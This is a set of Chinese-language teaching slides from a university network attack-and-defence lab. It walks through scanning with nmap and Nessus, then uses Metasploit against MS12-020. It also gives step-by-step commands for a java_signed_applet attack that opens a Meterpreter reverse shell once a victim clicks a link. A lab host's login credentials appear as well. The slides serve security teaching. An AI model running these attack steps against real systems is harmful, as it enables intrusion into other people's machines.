網路攻防實習

1. 網路攻防實習 ITLAB Hou-Yi Chou, Chih-Kai Mo, Yu-Ting Lai

2. 今天的目標 找出目標 偵查弱點 攻擊目標

3. nmap • 強力掃描工具 • 安裝方式 • sudo apt-get install nmap • 掃描方式請參考Module04

4. Nessus 弱點掃描器 目前最新版本5.2.1(2013/6/6) 載點：http://www.rapid7.com/products/metasploit/download.jsp 台灣地區已無法從官網免費下載，需透過美國proxy代理，或其他管道 取得認證碼http://www.tenable.com/products/nessus/nessus-plugins/obtain-an-activation-code 這邊還是需要用到proxy，先別急著關…

5. Nessus • 這邊提供另一個載點 • http://itlab.ee.ncku.edu.tw/download/Nessus-5.2.1-ubuntu910_amd64.deb • 此檔案僅供測試，請於實驗結束後刪除

9. Nessus 安裝與啟動步驟 • $ dpkg -i Nessus-xxx.deb • $ /etc/init.d/nessusd start • $ firefox • https://localhost:8834

17. Nessus • 由於nessus資料庫更新需要一段時間，助教這邊提供一台安裝好nessus的主機 • 主機位置：自己找XD • 連接埠：8834 • 帳號：nessus • 密碼：password • 注意：nessus僅供測試用途，請勿對外掃描！

18. 然後呢？ So what? 這不是Module05就做過了嗎？ = = 老師沒教的是 怎麼利用這些弱點？ 好戲上場！

19. 利用弱點攻擊目標 Metasploit 載點：http://www.rapid7.com/products/metasploit/download.jsp 備用載點：http://itlab.ee.ncku.edu.tw/download/metasploit-latest-linux-x64-installer.run 滲透測試用 目前最新版本4.6.2(2013/6/6)

20. Metasploit • 安裝 • sudochmod 755 metasploit-xxxx.run • sudo ./metasploit-xxxx.run • 進入主控台模式 • sudomsfconsole • 利用剛剛的弱點：MS12-020

23. msfconsole • 一些基本指令 • help • show //顯示各種資訊 • search //尋找包含關鍵字的漏洞、弱點… • info //顯示某個系統漏洞的相關訊息 • use //使用模組 • set //設定選項

28. 還有更可怕的 DoS攻擊僅僅是阻斷服務(癱瘓主機)，對於企業或政府單位來說具有很大傷害 不過對於一般人來說只是 當機！ 好像不痛不癢嘛… Windows不意外 讓我們繼續看下去…

29. 攻擊步驟 use exploit/multi/browser/java_signed_applet set payload windows/meterpreter/reverse_tcp show options set SRVHOST x.x.x.x set LHOST x.x.x.x show options exploit 發送網頁連結給受害者

31. 攻擊步驟 • 等候受害者連接… • sessions -l • sessions -i xx • shell • 剩下的請自行發揮想像力 • notepad • calc • …

34. 結論 • 地球是很危險的！ • 請時常維護系統 • 更新作業系統 • 開啟防火牆 • 更新防毒軟體病毒碼 • 提高資訊安全意識 • 不要亂點連結 • 小心不明E-mail • 時常關注運行程序與開啟的埠口 • 保持警覺！

35. 附錄 • 工具清單 • ping • traceroute • nc (net cat) • nmap • nessus • metasploit

36. Thank you !